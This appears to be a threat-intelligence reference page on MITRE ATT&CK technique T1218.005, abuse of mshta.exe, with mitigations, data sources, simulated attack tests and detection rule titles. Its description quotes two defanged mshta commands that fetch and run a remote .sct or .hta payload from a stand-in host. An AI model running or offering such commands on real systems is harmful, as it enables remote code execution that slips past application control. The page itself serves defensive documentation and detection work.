T1218.005: Mshta

Data from MITRE ATT&CK®:

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

Execution Prevention

Block execution of code on a system through application control, and/or script blocking.

Disable or Remove Feature or Program

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Network Connection Creation (Network Traffic)

Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)

Command Execution (Command)

The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )

File Creation (File)

Initial construction of a new file (ex: Sysmon EID 11)

Process Creation (Process)

The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)

Mshta used to Execute PowerShell

windows

Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement

windows

Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject

windows

Invoke HTML Application - Jscript Engine Simulating Double Click

windows

Mshta executes VBScript to execute malicious command

windows

Invoke HTML Application - Simulate Lateral Movement over UNC Path

windows

Invoke HTML Application - Direct download from URI

windows

Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler

windows

Mshta Executes Remote HTML Application (HTA)

windows

Invoke HTML Application - JScript Engine with Inline Protocol Handler

windows

Remotely Hosted HTA File Executed Via Mshta.EXE

windows process creation

Csc.EXE Execution Form Potentially Suspicious Parent

windows process creation

Potential LethalHTA Technique Execution

windows process creation

Suspicious MSHTA Child Process

windows process creation

Suspicious JavaScript Execution Via Mshta.EXE

windows process creation

MSHTA Suspicious Execution 01

windows process creation

HackTool - CACTUSTORCH Remote Thread Creation

windows create remote thread